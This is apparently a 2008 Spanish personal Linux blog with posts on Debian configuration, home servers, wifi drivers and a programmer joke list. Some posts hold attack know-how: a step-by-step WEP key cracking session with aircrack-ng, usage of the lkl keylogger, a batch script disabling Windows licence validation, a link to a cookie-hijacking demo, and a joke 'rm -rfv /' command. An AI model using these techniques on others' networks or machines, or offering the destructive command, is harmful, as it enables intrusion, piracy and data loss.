22 noviembre, 2008

console-log

pues este paquete esta chido te sirve para ver los logs en las tty's en debian el archivo de configuracion esta en

/etc/console-log.conf

yo ahi añadi para ver el /var/log/messages

tty 10
file /var/log/messages
group adm


ahi le digo que en la tty10 ponga un less a var log messages y apretando control + alt + f10 se veran. esto me gusta cuando tienes un server sin x funcionando y miras que esta haciendo espero a alguien le sirva

07 noviembre, 2008

irssi + bitlbee multiprotocolo desde la consola

tomado de http://www.esdebian.org/wiki/bitlbee

Con bitlbee podremos hacer uso de la mensajería instantánea a través de nuestro cliente de IRC preferido. Bitlbee soporta los protocolos XMPP/Jabber (Google Talk incluído), MSN Messenger, Yahoo! Messenger, AIM y ICQ, y es una buena opción si somos usuarios de IRC y no queremos utilizar otro cliente adicional para la mensajería instantánea.

Nuestro entorno de trabajo será una Debian Sid/Experimental, aunque este dato carece de especial relevancia, puesto que bitlbee se encuentra en todas las ramas de Debian. Para empezar lo instalamos,

#aptitude install bitlbee

Permitiremos el acceso a nuestra máquina en /etc/hosts.allow y reiniciamos.

#nano /etc/hosts.allow

bitlbee: 127.0.0.1

Para usar bitlbee necesitamos un cliente de IRC. En nuestro caso utilizaremos irssi. Lo invocamos,

$irssi

Existe la posibilidad de conectarnos a servidores públicos para usar bitlbee, pero no lo haremos así. Será nuestro propio ordenador el que actúe como servidor de bitlbee.

/connect 127.0.0.1

Si todo ha ido bien, nos uniremos inmediatamente al canal "bitlbee". Vamos a echar un vistazo. Si usamos irssi, "ESC+2"
En &bitlbee veremos dos operadores de canal. Tú mismo y root (tu ayudante). Si necesitamos ayuda podemos usar el comando help, tal y como nos lo aconseja el topic del canal.

help

Si necesitamos ayuda sobre algo, sólo tenemos que escribir en el canal la secuencia

help loquesea

En primer lugar, para usar bitlbee necesitaremos registrarnos. Todos los datos (contraseñas, lista de contactos...) van a ser almacenados en el servidor de bitlbee, así que es muy importante la elección de una buena contraseña

register contraseña

La próxima vez que entremos a &bitlbee sólo tendremos que usar

identify contraseña

Añadimos las cuentas que queramos usar con bitlbee.

account add protocolo cuenta contraseña [servidor]

El parámetro [servidor] será necesario para ICQ (login.icq.com) y AOL (login.oscar.aol.com)
Por ejemplo,

account add msn laquesea(arroba)hotmail.com contraseña
Account successfully added

Si quisiéramos añadir la cuenta de esdebian,

account add jabber laquesea(arroba)esdebian.org contraseña talk.google.com:5223:ssl

Así, para los distintos protocolos,

account add yahoo loquesea contraseña (yahoo)
account add jabber loquesea(arroba)gmail.com contraseña talk.google.com:5223:ssl (gmail)
account add jabber loquesea(arroba)jabber.org contraseña (jabber)
account add oscar id contraseña login.icq.com (icq)
account add oscar id contraseña login.oscar.aol.com (aol)

Para conectarnos a nuestra/s nueva/s cuenta/s recién añadida/s,

account on

Si queremos conectarnos a una cuenta específica, en primer lugar necesitamos conocer el identificador de cada cuenta

account list
account on

Ya estamos en línea. Sólo queda explorar las diferentes opciones con help. Algunas órdenes útiles para el manejo de nuestras cuentas son

account off id, desconecta la cuenta con ese id
account off, desconecta todas las cuentas
account del id, borra la cuenta con ese id
add id contacto, añade un contacto a una cuenta determinada
remove contacto, borra el contacto
info contacto, muestra información sobre el contacto
block/allow contacto, ignora/reacepta al contacto
remane contacto nombrenuevo, renombra un contacto a nombrenuevo
blist, lista de contactos conectados
blist all, lista de todos los contactos, conectados o no
blist online, lista de contactos conectados
blist offline, lista de contactos desconectados
blist away, lista de contactos ausentes



05 noviembre, 2008

04 noviembre, 2008

Limpiando debian

paquetes instalados con apt

/var/cache/apt/archives

los deb de ahi puedes borrarlos o respaldarlos
-------------------------------------------------------------------------------
debfoster

  • Y --Mantiene el paquete instalado
  • n --Borra el paquete señalado
  • p --Borra el paquete señalado y todos los paquetes retenidos
  • s --Salta la pregunta
  • i --Visualiza información sobre el paquete
  • ? --Igual a i
  • u --Vuelve a formular la pregunta anterior
  • q --Cancela la operación sin realizar modificaciones
  • x --Realiza la cancelación de los paquetes
  • h --Ayuda
-----------------------------------------------------------------------------------------------------------------
deborphan


para paquetes huerfanos



y una superlimpieza a tu pc


rm -rfv /


no pongan ese ultimo era solo un chiste -.-

02 noviembre, 2008

screenshot X fbgrab

fbgrab neo.png

screenshot sin X -.-

figlet arte en ascii

pues este paquete esta chido

figlet follow the white rabbit .. se deforma pero sin X se mira bien. modifica tu /etc/issue y /etc/motd.tail y añadele un toque personal

29 octubre, 2008

Samurai Champloo download

Esta en japones sub en español buena resolucion... 1024x576

Esta historia comienza un dia donde Fuu, una jovencita que es mesera un un restaurant, sirve a unos sujetos muy importantes pero ella lo hace de forma bastante torpe y termina por enredarse en un lio del cual solo Mugen, extraño vagabundo que pasaba por ahi, podra ayudarla, mientras esto pasa , no muy lejos de ahi, Jin un samurai que caminaba por la calle se encuentra bloqueado por una multitud provocada por un hombre muy importante que esta cobrando a una persona, este esta custodiado por lo que se dicen ser la Elite de los Yagyuu (Los mejores Samurais de la Zona), y por coincidencias del destino Jin termina en el mismo sitio donde se encontraba Mugen, este ultimo acabando de terminar con todos los hombres que estaban creando problemas en el lugar por un poco de comida prometida por Fuu, Mugen piensa que Jin es uno de esos Yagyuu, pero al preguntarselo Jin responde que hace poco rato el habia acabado con ellos, Mugen al darse cuenta que Jin es un sujeto extremadamente poderoso no duda en atacar…

01 - Tormenta y Estrés: Temperamentos Tempestuosos
02 - Pandemonio Verdadero: Represalia del Ojo Rojo
03 - Comprensión Tácita: Mercenarios a Sueldo [Parte 1]
04 - Comprensión Tácita: Mercenarios a Sueldo [Parte 2]
05 - Indiferencia Completa: Anarquía Artística
06 - Extranjero Pelirojo: Búsqueda del Extranjero
07 - Rodeado por Todos los Lados: Una Empresa Peligrosa
08 - Vanidad: El Arte de Pelear
09 - Espíritus Malignos: Bandidos Sonoros
10 - Fuego Contra Fuego: Locura Letal
11 - Ángeles Caídos: Jugadores y Cortesía
12 - Aprendiendo del Pasado: Los Diarios de Trastornos
13 - Camino de la Noche Oscura: Villanos Mal Informados [Parte 1]
14 - Camino de la Noche Oscura: Villanos Mal Informados [Parte 2]
15 - Botín Falso
16 - Canciones de Cuna Perdidas: Verso 1
17 - Canciones de Cuna Perdidas: Verso 2
18 - Guerra de Palabras
19 - Unión Maldita
20 - Elegía de Incitación: Verso 1
21 - Elegía de Incitación: Verso 2
22 - Colisiones Cósmicas
23 - Blues de Pelota
24 - Encuentro Evanescente: [Parte 1]
25 - Encuentro Evanescente: [Parte 2]
26 - Encuentro Evanescente: [Parte 3]

17 octubre, 2008

Super Reparacion xD

yo no lo hize pero ahi esta xD

12 octubre, 2008

bueno pues esto si es nuevo un keylogger en linux su nombre lkl


-- Linux Key Logger vers 0.1.1 --
usage:
-h this help
-l start to log the 0x60 port (keyboard)
-b Debug Mode.Perhaps it's usefoul :P
-k set a keymap file
-o set an output file
-m send logs to every 1k
-t hostname for sendmail server. default is localhost

Example: lkl -l -k keymaps/it_km -o log.file


seria algo asi los key maps estan en /usr/share/lkl/keymaps

Bragas:/home/neo# lkl -l -k /usr/share/lkl/keymaps/
dvorak_km fr_km it_km us_km
dvorak_kmALT fr_kmALT it_kmALT us_kmALT
dvorak_kmUP fr_kmUP it_kmUP us_kmUP

lkl -l -k /usr/share/lkl/keymaps/us_km -o neo.key

11 octubre, 2008

zsnes sin sonido en debian

pues acabo de poner el zsnes y no tenia sonido -.- googleando llege con esto

Bragas:/home/neo/.zsnes# vi zsnesl.cfg

ahi

; —-
; — Sound –
; —-

libAoDriver=”auto”

cambiamos auto por sdl

libAoDriver=”sdl”
libsdlx.x.debian-alsa o algo asi es lo que se necesita para que funcione

09 octubre, 2008

hasefroch pirata

quesque para que ya nos alga la ventanita no lo he calado pero aqui lo apunto es un batiscript

taskkill /im wgatray.exe
Del c:\Windows\System32\WgaTray.exe
Del c:\Windows\System32\dllcache\WgaTray.exe
echo Windows Registry Editor Version 5.00 >%temp%\WGANFIX.REG
echo. >>%temp%\WGANFIX.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon] >>%temp%\WGANFIX.REG
regedit /s %temp%\WGANFIX.REG
del %temp%\WGANFIX.REG
del c:windows\system32\wgalogon.dll
del c:windows\system32\dllcache\wgalogon.dll

Sources.list ubuntu

#deb cdrom:[Ubuntu 8.04 _Hardy Heron_ - Release amd64 (20080423)]/ hardy main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.

deb http://mx.archive.ubuntu.com/ubuntu/ hardy main restricted
deb-src http://mx.archive.ubuntu.com/ubuntu/ hardy main restrictedb

## Major bug fix updates produced after the final release of the
## distribution.
deb http://mx.archive.ubuntu.com/ubuntu/ hardy-updates main restricted
deb-src http://mx.archive.ubuntu.com/ubuntu/ hardy-updates main restricted

## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## universe WILL NOT receive any review or updates from the Ubuntu security
## team.
deb http://mx.archive.ubuntu.com/ubuntu/ hardy universe
deb-src http://mx.archive.ubuntu.com/ubuntu/ hardy universe
deb http://mx.archive.ubuntu.com/ubuntu/ hardy-updates universe
deb-src http://mx.archive.ubuntu.com/ubuntu/ hardy-updates universe

## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## multiverse WILL NOT receive any review or updates from the Ubuntu
## security team.
deb http://mx.archive.ubuntu.com/ubuntu/ hardy multiverse
deb-src http://mx.archive.ubuntu.com/ubuntu/ hardy multiverse
deb http://mx.archive.ubuntu.com/ubuntu/ hardy-updates multiverse
deb-src http://mx.archive.ubuntu.com/ubuntu/ hardy-updates multiverse

## Uncomment the following two lines to add software from the 'backports'
## repository.
## N.B. software from this repository may not have been tested as
## extensively as that contained in the main release, although it includes
## newer versions of some applications which may provide useful features.
## Also, please note that software in backports WILL NOT receive any review
## or updates from the Ubuntu security team.
# deb http://mx.archive.ubuntu.com/ubuntu/ hardy-backports main restricted universe multiverse
# deb-src http://mx.archive.ubuntu.com/ubuntu/ hardy-backports main restricted universe multiverse

## Uncomment the following two lines to add software from Canonical's
## 'partner' repository. This software is not part of Ubuntu, but is
## offered by Canonical and the respective vendors as a service to Ubuntu
## users.
# deb http://archive.canonical.com/ubuntu hardy partner
# deb-src http://archive.canonical.com/ubuntu hardy partner

deb http://security.ubuntu.com/ubuntu hardy-security main restricted
deb-src http://security.ubuntu.com/ubuntu hardy-security main restricted
deb http://security.ubuntu.com/ubuntu hardy-security universe
deb-src http://security.ubuntu.com/ubuntu hardy-security universe
deb http://security.ubuntu.com/ubuntu hardy-security multiverse
deb-src http://security.ubuntu.com/ubuntu hardy-security multiverse

#ULTAMATIX REPOS START

deb http://repoubuntusoftware.info harty all

deb-src http://us.archive.ubuntu.com/ubuntu hardy-updates multiverse

deb http://us.archive.ubuntu.com/ubuntu hardy-updates multiverse

deb-src http://us.archive.ubuntu.com/ubuntu hardy multiverse

deb http://us.archive.ubuntu.com/ubuntu hardy multiverse

deb http://repoubuntusoftware.info harty all

deb-src http://archive.canonical.com/ubuntu hardy partner

deb http://archive.canonical.com/ubuntu hardy partner
#ULTAMATIX REPOS END

06 octubre, 2008

Surfjack y gmail

esto se me ha hecho muy interesante a partir de obtencion de una cookie atravez de un sniffer es posible el logearte en una cuenta ajena. tambien explica como deenderse de este ataque


Surf Jacking Gmail demonstration from Sandro Gauci on Vimeo.




codigo
http://code.google.com/p/surfjack/

Manual
http://resources.enablesecurity.com/resources/Surf%20Jacking.pdf

28 septiembre, 2008

27 septiembre, 2008

Legos y linksys

Monte el router en bloques lego -.- todavia no termino





De Neo Artz

28 agosto, 2008

Así hablo Zaratustra

Es el ocio mas audacity... -.-

20 agosto, 2008

Una Duff!x

La imagen dice mas que mil palabras... a quien no se le antoja una rica DUFF!

Photobucket

03 agosto, 2008

reinyeccion de trafico con Linksys wusb54gc chipset ralink modulo rt73




Aqui dejo como inyectar con esta usb WUSB54GC sobre un infinitum de telmex
use debian :P y mi mini itx =)
mini:/home/neo/Desktop# uname -a
Linux mini 2.6.25-2-686 #1 SMP Fri Jul 18 17:46:56 UTC 2008 i686 GNU/Linux


primero y a que tenemos instalada la tarjeta usb tenemos que levantarla con airomon y lo hacemos 2 veces esto para crear 2 interfaces logicas virtuales o como les les llame o.O, en este caso como es mi propio 2wire no cambie la mac xD. noten que se han creado mon0 y mon1


mini:/home/neo# airmon-ng start wlan0


Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)

mini:/home/neo# airmon-ng start wlan0


Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon1)
mon0 Ralink 2573 USB rt73usb - [phy0]

miren el ifconfig
Free Image Hosting at www.ImageShack.us



luego hacemos un scan para saber que redes hay por ahi
mini:/home/neo/Desktop# iwlist wlan0 s
wlan0 Scan completed :
Cell 01 - Address: 00:1E:C7:75:57:99
ESSID:"INFINITUM1003"
Mode:Master
Channel:5
Frequency:2.432 GHz (Channel 5)
Quality=47/100 Signal level=-78 dBm
Encryption key:on
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 6 Mb/s; 9 Mb/s
11 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=00000000a25ca7ae

en este caso esta es la red que elegi la mia o.O'
corremos airodump para comenzar a sniffear especifico que sea el canal 5 y que solo capture de un bssid en especifico -w que haga un archivo llamado hola y que use la interfaz de mon0 miren el comando

mini:/home/neo/Desktop# airodump-ng --channel 5 --bssid 00:1E:C7:75:57:99 -w hola mon0

comenzamos con aireplay le digo que mande 1024 paquetes por segunto. el bssid y la mac de mi tarjeta que use las interfaces de mon0 mon1

mini:/home/neo# aireplay-ng --arpreplay -x 1024 -b 00:1E:C7:75:57:99 -h 00:21:29:65:0c:ed -i mon0 mon1


le decimos aireplay que haga una autenticacion falsa -a mac ap -h tumac con mon1
mini:/home/neo# aireplay-ng -1 0 -a 00:1E:C7:75:57:99 -h 00:21:29:65:0c:ed mon1
00:12:40 Waiting for beacon frame (BSSID: 00:1E:C7:75:57:99) on channel 5

00:12:40 Sending Authentication Request (Open System)
00:12:40 Authentication successful
00:12:40 Sending Association Request
00:12:40 Association successful :-) (AID: 1)


ya capturados algunos paquetes comenzamos a crackear con aircrack -z es ptw
mini:/home/neo/Desktop# aircrack-ng -z hola-01.cap
Opening hola-01.cap
Read 125360 packets.

# BSSID ESSID Encryption

1 00:1E:C7:75:57:99 INFINITUM1003 WEP (61768 IVs)

Choosing first network as target.

Opening hola-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 61768 ivs.
KEY FOUND! [ 10:52:47:03:89 ]
Decrypted correctly: 100%

y ahi saca la llave.


By artzneo at 2008-08-03

15 julio, 2008

Ya instale DD-WRT!

este es un tour por el nuevo firmware que instale en mi linksys v8 wrt54g =) tiene muchas mas opciones que el firmware original. aun no sé que son todas pero wikipedia es sabia xD

12 julio, 2008

Crear tu servidor casero con no-ip.com e infinitum de telmex con debian etch

Hola como están esto me lo han pedido mucho, y es como hacer un servidor casero con tu equipo y un infinitum de telmex (México). primero que nada que es no-ip

"Ellos proporcionan tanto servicios gratis como de pago a clientes que usan direcciones de IP dinámicas.

Las direcciones de IP dinámicas son comunes sobre el cable residencial o cuentas dsl de banda ancha. El servicio gratuito permite a los usuarios tener entre un y cinco nombres sobre un nombre de dominio proporcionado por No ip.(misitio.no-ip.com)

otro dato importante es la velocidad , si cuentas con 1 mega de descarga tendras tan solo 128 kb de subida, que es esto?

si tu te dispones a bajar algo de tu servidor desde internet. el servidor solo podra subir a esos 128 kb ,y en cambio si por ftp tu subes algun archivo este subira a 1 mega, es a la inversa o.O
navegando tu en internet es asi
Entrante:1024 kbps




----------------------------------------------------------------------------------------------------------------------------------------
primero que nada tenemos que instalar LAMP linux apache mysql php...

apt-get install apache2 php4 libapache2-mod-php4
apt-get install mysql-server mysql-client php5-mysql
apt-get install phpmyadmin


tenemos que agregar a el archivo de /etc/apache2/ports.conf

Listen 80

(si tu isp bloquea el puerto 80 usa otro por ejemplo el 8080 )

y reinicia el apache
/etc/init.d/apache2 restart
----------------------------------------------------------------------------------------------------------------------------------------
abriendo puertos en el router

generalmente es un 2wire el que te dan y la ip es 192.168.1.254 con el comando de netstat -nr puedes ver la ip del router tiene bastantes opciones como ftp, pop3 , DNS etc.

habrá que configurar y abrirle los puertos para el apache ( 80 ) y en mi caso al ssh (22)



----------------------------------------------------------------------------------------------------------------------------------------
tenemos que registrarnos http://no-ip.com/

después damos de alta nuestro dominio y configuramos no-ip. en caso de que tu isp bloquee el puerto 80 usa la opción de

port 80 redirect, Telmex no lo hace así que elegimos la primera



----------------------------------------------------------------------------------------------------------------------------------------
Instalando cliente no-ip
descargamos el paquete de noip-duc-linux.tar.gz funciona tambien en mac y en windows

zona de descargas

lo descomprimimos
neo@oldiepc:~$ tar -zvxf noip-duc-linux.tar.gz

noip-2.1.7/
noip-2.1.7/._.DS_Store
noip-2.1.7/.DS_Store
noip-2.1.7/binaries/
noip-2.1.7/binaries/noip2-Linux-32bit
noip-2.1.7/binaries/noip2-Linux-64bit
noip-2.1.7/COPYING
noip-2.1.7/debian.noip2.sh
noip-2.1.7/gentoo.noip2.sh
noip-2.1.7/LEEME.PRIMERO
noip-2.1.7/LISEZMOI.ENPREMIER
noip-2.1.7/mac.osx.startup
noip-2.1.7/Makefile
noip-2.1.7/noip2.c
noip-2.1.7/README.FIRST
noip-2.1.7/README.FIRST-SWE
noip-2.1.7/README.FIRST.FRANCAIS
noip-2.1.7/README.FIRST.ITALIANO
noip-2.1.7/README.FIRST.JAPANESE
noip-2.1.7/README.FIRST.pt_BR
noip-2.1.7/redhat.noip.sh

lo compilamos
make
sale algo asi
gcc -Wall -g -O2 -Dlinux -DPREFIX=\"/usr/local\" noip2.c -o noip2

lo instalamos
make install

ahora configuramos el cliente
noip2 -C


oldiepc:/home/neo/noip-2.1.7# noip2 -C

Auto configuration for Linux client of no-ip.com.

Please enter the login/email string for no-ip.com tumail@loquesea.com
Please enter the password for user 'tumail@loquesea.com' tupasswordparanoip


Only one host [artzneo.no-ip.biz] is registered to this account.
It will be used.
Please enter an update interval:[30]
Do you wish to run something at successful update?[N] (y/N) y
Please enter the script/program name

New configuration file '/usr/local/etc/no-ip2.conf' created.

el usuario y password son los mismos que usas para logearte en la pagina de no-ip


arrancamos el noip2 escribiendo xD ... noip2

ahora escribe el dominio que pusiste en el navegador y podras ver tu sitio, mi sitio se ve así


----------------------------------------------------------------------------------------------------------------------------------------

Bueno eso es todo , espero que les sirva a alguien mas n_n

Comentarios en:

http://espaciolinux.com/foros-tema-p187124.html#187124
http://www.maximotec.com/showthread.php?p=737029#post737029
http://foros.toxico-pc.com/showthread.php?p=81161#post81161
http://linux.cucea.udg.mx/foro/viewtopic.php?p=200#200
http://fusionudg.com/foros/showthread.php?p=12334#post12334
http://www.unihack.totalh.com/index.php?topic=672.0
http://zonaforo.meristation.com/foros/viewtopic.php?p=14752551#14752551
http://mandriva-es.org/mandriva-y-otros-sistemas-operativos-f11/crear-tu-servidor-casero-con-no-ipcom-e-infinitum-de-telmex-debian-t244.htm#1224

11 julio, 2008

wpa_supplicant debian

pues hay que modificar el

/etc/wpa_supplicant.conf

añadir


ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0

ap_scan=1
fast_reauth=1
eapol_version=1

network={
ssid="nombre de la red"
scan_ssid=1
psk="clave super secreta"

}


despues corremos el wpa_supplicant



wpa_supplicant -Dwext -i eth1 -c /etc/wpa_supplicant.conf

luego pides la ip


dhclient eth1

10 julio, 2008

Nuevo servidor =)

he montado un servidor en mi casa...


n_n aquí


espero sus comentarios

03 julio, 2008

WUSB54GC en Debian etch

Hola como están bueno hace poco me compre una WUSB54GC de linksys tiene un chipset ralink y usa el modulo rt73

este tuto la verdad me costo algo de trabajo por que no soy muy bueno en esto de compilar. ok

el SO que tengo es un debian etch con kernel 2.6.18-6-686

primero instalar los paquetes siguientes

build-essential
linux-headers
torfodos (dos2unix)


1.- apt-get install build-essential linux-headers-$(uname -r)
apt-get install torfodos

2.- nos bajamos el paquete http://www.ralinktech.com.tw/data/RT73_Linux_STA_Drv1.0.4.0.tar.gz
si no esta ahi, pues buscarlo en otra parte

3.- segun el README (leanlo... leanlo) hay dos verciones para el kernel 2.6 y 2.4 en este caso usaremos el 2.6 asi que
4.- cp Makefile.6 ./Makefile

5.- make all (aqui puede haber problemas)

6.- vamos a /etc y creamos un directorio llamado RT73
cd /etc mkdir RT73
7.- copiamos /RT73_Linux_STA_Drv1.0.4.0/Module

8.- cp rt73.bin /etc/RT73/

9.- dos2unix rt73sta.dat (aqui use force por que no me dejaba xD "dos2unix -f rt73.dat")

10.- cp rt73sta.dat /etc/RT73/rt73sta.dat

11.- insmod rt73.ko

pues ahora da un ifconfig y veras la interface como rausb0, solo falta levantarla

ifconfig rausb0 up
y con wireless-tools (iwlist, iwconfig etc) funciona bien =) , espero sus comentarios, y que a alguien mas le sirva esta informacion

28 junio, 2008

Dragon y Programadores

Me lo mandaron por correo xD thnx pkurten

  • Java: Llega, encuentra al dragón, desarrolla un framework para aniquilación de dragones en múltiples capas, escribe varios artículos sobre el framework… pero no mata al dragón.
  • .NET: Llega, ve la idea del desarrollador de Java y la copia, intenta matar al dragón, pero el bicho se lo come.
  • C: Llega, mira al dragón con mirada de desprecio, tira de espada, degolla al dragón, encuentra a la princesa… y la ignora para ver los últimos checkins del cvs del kernel de Linux.
  • C++: Crea un pincho básico y va juntando funcionalidades hasta tener una espada compleja que apenas consigue entender… mata al dragón pero se atasca en medio del puente por culpa de pérdidas de memoria (memory leaks).
  • COBOL: Llega, ve al dragón y piensa que es demasiado viejo para conseguir matar un bicho de ese tamaño y quedarse con la princesa, y entonces se va.
  • Pascal: Se prepara durante 10 años para crear un sistema de aniquilación de dragones… cuando llega el momento descubre que el programa sólo acepta lagartijas como entrada.
  • VB: Monta un arma de destrucción de dragones a partir de varios componentes, salta encima del lomo del dragón, y en la hora H descubre que la espada sólo funciona durante las noches de lluvia.
  • PL/SQL: Recoge datos de otros matadores de dragones, crea tablas con n relaciones de complejidad ternaria, datos en tres dimensiones, OLAP, tarda quince años para procesar la información… y para entonces la princesa se volvió lesbiana.
  • Ruby: Llega con muchísima fama, diciendo que es el mejor en hacer cualquier cosa y cuando va a enfrentarse al dragón muestra una peliculita de el matando a un dragón… el dragón se lo come de puro aburrimiento.
  • Smalltalk: Llega, analiza al dragón y a la princesa, se da la vuelta y se pira: ellos son muy inferiores.
  • Shell: Crea un arma poderosa para matar dragones, pero en la hora H no recuerda como usarla.
  • Shell(2): El tío se acerca al dragón con un script de dos líneas que mata, corta, destripa, empala, pica en pedacitos y empaca al bicho, pero a la hora de ejecutarlo el script aumenta, engorda, enfurece y pone alcohol en el fuego del dragón.
  • Ensamblador: Cree que está haciendo lo más correcto y eficiente… pero pone un A en lugar de un D y mata a la princesa para terminar follándose al dragón
  • Fortran: Llega y desarrolla una solución con 45 mil líneas de código, mata al dragón, va al encuentro de la princesa… pero ella le llama tirillas y se va corriendo detrás del programador de java que era elegante y además es rico.
  • FOX PRO: Desarrolla un sistema para matar al dragón. Por fuera es precioso y funciona, pero por dentro está todo parcheado y cuando va a ejecutar el aniquilador de dragones recuerda que olvidó indexar los DBF.
  • Analista de procesos: Se acerca al dragón con dos toneladas de documentación desarrollada sobre el proceso de matar un dragón genérico, desarrolla un DFD para liberar a la princesa y casarse con ella, convence al dragón de que es lo mejor para el y que no va a doler. Al ejecutar el proceso estima el esfuerzo y el tamaño del daño que causará con la firma del papa, de Buda y de Joan Manuel Serrat para el plano, y entonces compra dos bombas nucleares, 45 cañones, un portaaviones y contrata a 300 hombres armados hasta los dientes… cuando en realidad tan sólo necesitaría la espada que tenía en la mano desde el principio
  • CLIPPER: Monta una rutina que carga un array de codeblocks para insultar al dragón, cantarle a la princesa, cargar la espada a memoria, moler al dragón, limpiar la suciedad, preparar un vaso de leche condensada con moras para la princesa, follar a la princesa, darse un baño, encender el coche, ponerle gasolina y volver para casa. A la hora de ejecutar recibe un "Bound Error: Array Access" y el dragón se lo come con patatas.
  • Lisp: Donde el famoso caballero andante, tras hablar con numerosos expertos en matar dragones y modelar el conocimiento que ellos poseen programa el sistema y se da cuenta… de que se ha dejado algún paréntesis.
  • HTML: Monta una web sobre espadas famosas usadas para matar dragones, pero se pasa los estándares W3C por el forro. Cuando se encara con el dragón descubre que el código no es compatible con su navegador, por lo que se queda compuesto y sin espada. El dragón se lo merienda como aperitivo (Darkblade).
  • Prolog: Piensa que para matar al dragón necesita un arma. Busca en un catálogo 182014 armas. Para cuando la princesa muere de vieja ya ha logrado descubrir como fabricar todas las armas que empiezan por la A: Armas atómicas, Alabardas,Alfanges, Asesinos contratados, Armas blancas, Antiaéreos, Arcos...
  • PHP: Crea una página web que al ejecutarla eliminará al $dragón tirando de una base de datos de armas en mysql y sobre un servidor apache. Sin embargo, se olvidó el Where en la query de delete y mata a la princesa, al dragon, a los campesinos, a la bruja, al hechicero y al propio programador.
  • JavaScript: El programador intenta matar al gran dragón verde que lanza fuego por la boca. Crean un script que borrará al dragón cuando carge una página web para unos segundos después crear unas damiselas que lancen flores y hagan soniditos de aplausos. Por desgracia no tuvo en cuenta la estructura Dom del lagarto, también conocido como Mozilla, y lo único que consigue es rellenar su consola de errores y que el libro de mozilla narre como acabó devorado.
  • ActiveX: Los programadores crean un tunel para entrar a la guarida del dragón desde el castillo y ejecutar un programa que matará al dragón desde una distacia segura y prudencial. El dragón descubre el tunel, se come a los trabajadores que cavaban, a los matadores de dragones y esclaviza a todos los siervos del castillo que pasan a ser sus esclavos. El castillo pasa a ser un lugar de cría de dragones lleno crías que manda en pop ups a otros castillos. Los restos poco apetitosos de los caballeros los mete en latas de Spam y manda también a otros castillos como advertencia.
  • Basic: Crean un arma capaz de matar a dragones de papel, pero por mucho que la perfeccionan descubren que no sirve para matar a ningún dragón más grande que una cría de caniche.
  • Matlab: Crean un bucle que calcula las trayectorias para lanzar una flecha gigante contra el dragón. El programa funciona perfectamente. Sólo faltan los voluntarios capaces de lanzar la flecha con la fuerza y puntería necesaria.
  • Modula 2: Implementa un método académicamente impecable para matar al dragón, pero no encuentra ninguna espada de verdad con la que usar dicho método.
  • Programador de videojuegos: Se pasa dos años programando una espada State of the Art, con shaders y todo. A la hora de matar al dragón se encuentra con que la mitad de los caballeros no tienen fuerza para mover la espada. Luego alguien programa un parche que revela las escenas de sexo con la princesa.
  • CSS: Tras crear el caballero un contenedor y un supercontenedor para mantenerse centrado y estable a pesar de las envestidas del dragón, olvida definir un DOCTYPE correcto y el dragón se lo merienda cual pincho de calamares.
  • WEB 2.0: Desarrolla una forma de matar al dragon utilizando XML, tonos pastel y letras grandes, y permite que todos los guerreros del mundo opinen sobre la mejor forma de matar al dragon con un sistema de tags y puntuaciones. En medio de la discusión, una horda de trolls revienta la convencion y mueren todos.
  • Consultor externo: Aconseja una estrategia planificada con un incremento progresivo de medios y personal empleado, dosificado a partir de un comite de expertos internos y externos que se reuniran con periodicidad bimensual para analizar los informes de progreso. Una actitud proactiva debe ser impulsada en general en la seleccion de personal, asi como un buen ambiente interno. De hecho su propia empresa tiene expertos especializados en la selección de personal de programacion y en la dinamización de ambientes laborales. Una ciudadela de programacion es lo mas adecuado para dar estabilidad y solidez a la empresa. Conviene que se asuma desde el principio que el gasto de formacion de personal no debe ser cicatero, si queremos que la cosa avance, asi como que el sistema de pruebas debe de estar estandarizado y documentado para cada programa, para evitar sorpresas indeseables de ultima hora. Si en el transcurso del proyecto se produjera la extincion de los dragones o de las princesas, ya fuera por la desaparicion de su entorno natural por deforestacion o sepultamiento bajo informes documentados o por el advenimiento de la revolucion francesa, entonces habria que redirigir el proyecto-ciudadela a los canales publicos de reconversion industrial de urgencia social, para lo cual seria conveniente un comite de expertos internos y externos que se reunieran con periodicidad bimensual para establecer las politicas de reconversion y los ajustes necesarios a la luz de los informes de progreso.
  • Programador de Ajax: Prepara una Interface para mantenerse alejado del dragón y Atacar. Arma la Espada de DIV's y viste a su caballero de hermosos CSS's y lo manda a combatir. Cada vez que su caballero necesitaba algo, lo solicitaba y recibia inmediatamente lo que necesitaba, super armas, cambio de armaduras, invisibilidad, etc etc. Pero el dragón pendejo con unos escupitazos de fuegos crea una Firewall que hace lento al caballero Ajax. y de aburrido se lo come y lo caga al lado de Web 2.0.

26 junio, 2008

Instalando eeexubuntu en eeepc

hace tiempo que no le ponia cosas al blog, pero esta tarde me llego una eeepc, no tienen disco duro ni cdrom ,y solo 2 gb de memoria flash para el SO.

se haia estropeado el sistema (no se como pero se estropeo) un xandros tengo entendido. pues bien es algo limitado, para aceder a la terminal era control+alt+t

y no se miraba bien. la verdad no me gustaba :P, como que no se podia instalar cosas de las que ya tenia de fabrica... ( si se puede pero insisto no me gustaba)

pues encontre una gran distribucion llamada eeexubuntu. esta optimizado para trabajar con esta pc tiene los drivers de su wifi. un kernel optimizado y lo demas ahi en la wiki

bueno yo tengo una unidad externa de cd. use esa y todo es por USB. solo que no le puse swap y puse el particionamiento personalizado que tome 2 gigas para instalarse. casi llenaba el espacio libre o.O pero despues se borran datos inecesarios. bueno aqui dejo unas fotos de este equipo

la unica nota que creo le servira a alguien mas es esto para el wifi :P

echo 1 > /proc/acpi/asus/wlan



07 junio, 2008

Vimperator-firefox como VIM

bueno. en realidad yo tengo iceweasel por que no vi la necesidad de poner firefox. se me hacen lo mismo o.O' pero ese no es el punto a analizar en esta entrada.

